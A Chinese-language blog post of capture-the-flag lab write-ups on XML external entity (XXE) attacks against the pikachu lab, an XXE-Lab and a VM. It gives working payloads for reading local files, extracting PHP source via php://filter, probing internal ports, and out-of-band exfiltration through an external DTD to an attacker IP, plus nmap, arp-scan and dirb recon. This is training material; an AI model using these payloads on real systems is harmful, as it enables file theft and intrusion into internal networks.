XXE练习

Autumn.h2024-12-19 9:24

pikachu-XXE靶场

1.POC:攻击测试

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "a">]>
<foo>&xxe;</foo>

2.EXP:查看文件

<?xml version="1.0"?>
<!DOCTYPE foo [ 
<!ENTITY xxe SYSTEM "file:///C:/flag/flag" > ]>
<foo>&xxe;</foo>

3.EXP:查看源码

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=D:/phpstudy/phpstudy_pro/WWW/1.php">]>
<foo>&xxe;</foo>

4.EXP:DTD外部调用

<!ENTITY evil SYSTEM "file:///C:/flag/flag">

<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://172.16.1.195:80/evil.dtd">
%xxe;
]>
<foo>&evil;</foo>

5.EXP:探测内网存活主机与开放端口

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
<!ELEMENT foo ANY> 
<!ENTITY rabbit SYSTEM "http://127.0.0.1:80">
]>
<x>&rabbit</x>

端口开放回显很快

端口未开连接超时

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
<!ELEMENT foo ANY> 
<!ENTITY rabbit SYSTEM "http://127.0.0.1:8087">
]>
<x>&rabbit</x>

6.EXP:无回显探测

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://192.168.133.129:8888/?%file;'>">
%start;

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE message [ <!ENTITY % remote SYSTEM "http://172.16.1.195/66.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/flag/flag">
%remote;
%send;
]>

XXE-Lab靶场

目标获取flag

1.访问网页

2.尝试注入,获取flag

BP抓他瞧一瞧

看到支持接收xml数据注入一下试试

text/xml和application/xml

<!DOCTYPE username [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=C:/flag/flag">]>
<user>
  <username>
&xxe;
  </username>
  <password>1</password>
</user>

//flag{dmsioamdoiasdmdmwmdsmd}

XXE靶机

目标获取flag

1.装好靶机

这个样子就可以了

2.获取靶机IP

用Nmap扫描整个D段获取靶机IP

nmap -O 192.168.133.129/24

或者是用命令

arp-scan -l

4.信息收集

先去看看网页

Apache的默认页面,并什么可以利用的

利用dirb工具去扫一下后台目录和文件

dirb http://192.168.133.131/

挨个访问一遍后发现两个登录界面

5.尝试注入

xxe有回显点

抓包看看;尝试注入

查看admin.php的源码

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/admin.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
  </password>
</root>

解密后,在看源码发现好像是账号密码;去解密一下登录试试

登录后是这样,点击Flag后发现新的php文件

去访问看看

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
		</password>
</root>

解密后

Base32解密后发现还得64解码

得到一个php文件去访问试试

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/.flag.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
		</password>
</root>

6.成功获取flag

在php文件中运行

访问一下就成功获取flag

 SAFCSP{xxe_is_so_easy}
相关推荐
网络安全-老纪2 小时前
网络安全、Web安全、渗透测试之笔经面经总结(一)
安全·web安全
文人sec5 小时前
Python7-数据结构
数据结构·学习·web安全
Sunset-_5 小时前
sunset: midnight
web安全·网络安全·渗透测试
黑客Jack8 小时前
【网络安全】浅谈IP溯源的原理及方法
网络·tcp/ip·web安全
星河梦瑾14 小时前
CTF知识集-SQL注入
linux·运维·python·安全·网络安全
轨迹H18 小时前
一文学会“瑞士军刀“-netcat命令使用
linux·网络安全·渗透测试·nc
19999er19 小时前
Https&身份鉴权(小迪网络安全笔记~
网络·笔记·网络协议·web安全·http·网络安全·https
Hacker_Oldv20 小时前
网络安全、Web安全、渗透测试之笔经面经总结(二)
安全·web安全
运维有小邓@20 小时前
什么是零信任模型?如何实施以保证网络安全?
安全·web安全
热门推荐
01ARM学习(31)编译器对overlay方式的支持02玄机平台应急响应—webshell查杀03(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明04基于大语言模型(LLM)的合成数据生成、策展和评估的综述05HCIA-datacom数通题库和录播视频资料06Docker 夺命连环 15 问07【华东南AWDP】第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛区域赛 部分题解WP08WPS-0DAY-20230809的分析和利用复现09PyTorch机器学习实现液态神经网络10华为LTC流程体系的内涵(附PPT分享)